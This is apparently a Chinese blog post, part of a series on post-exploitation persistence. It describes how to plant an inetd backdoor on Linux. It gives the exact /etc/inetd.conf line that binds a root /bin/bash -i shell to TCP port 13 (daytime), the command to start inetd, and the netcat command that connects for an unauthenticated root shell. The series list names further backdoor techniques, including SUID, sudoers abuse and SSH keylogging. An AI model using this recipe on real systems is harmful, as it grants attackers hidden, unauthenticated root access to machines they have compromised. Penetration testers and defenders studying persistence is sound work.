操作系统权限维持(十五)之Linux系统-inetd远程后门

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门
操作系统权限维持(八)之Linux系统-SSHKey后门
操作系统权限维持(九)之Linux系统-添加用户后门
操作系统权限维持(十)之Linux系统-SSH 软连接后门
操作系统权限维持(十一)之Linux系统-SSH Wrapper后门
操作系统权限维持(十二)之Linux系统-sudoers利用后门
操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门
操作系统权限维持(十四)之Linux系统- Strace监听SSH来源流量记录密码后门

inetd远程后门

inetd,也叫作“超级服务器”,就是监视一些网络请求的守护进程,其根据网络请求来调用相应的服务进程来处理连接请求。

inetd.conf则是inetd的配置文件。inetd.conf文件告诉inetd监听哪些网络端口,为每个端口启动哪个服务。

位置是/etc/inetd.conf 配置格式:[servicename] [socktype] [proto] [flags] [user] [server_path] [args] 在配置文件下写入以下内容:

daytime stream tcp nowait root /bin/bash bash -i

daytime服务(13端口) 套接字类型 协议类型 不等待  用户组     提供服务的程序
daytime             stream   tcp     nowait root     /bin/bash bash -i

首先我们编辑该文件,向文件中写入上诉的命令

vim /etc/inetd.conf

在这里插入图片描述

然后我们输入

inetd

启动服务

在这里插入图片描述

这样配置好了以后利用以下命令远程连接直接能拿到root用户身份

nc targetIP 13 

在这里插入图片描述

posted @ 2023-03-28 17:05  私ははいしゃ敗者です  阅读(65)  评论(0编辑  收藏  举报  来源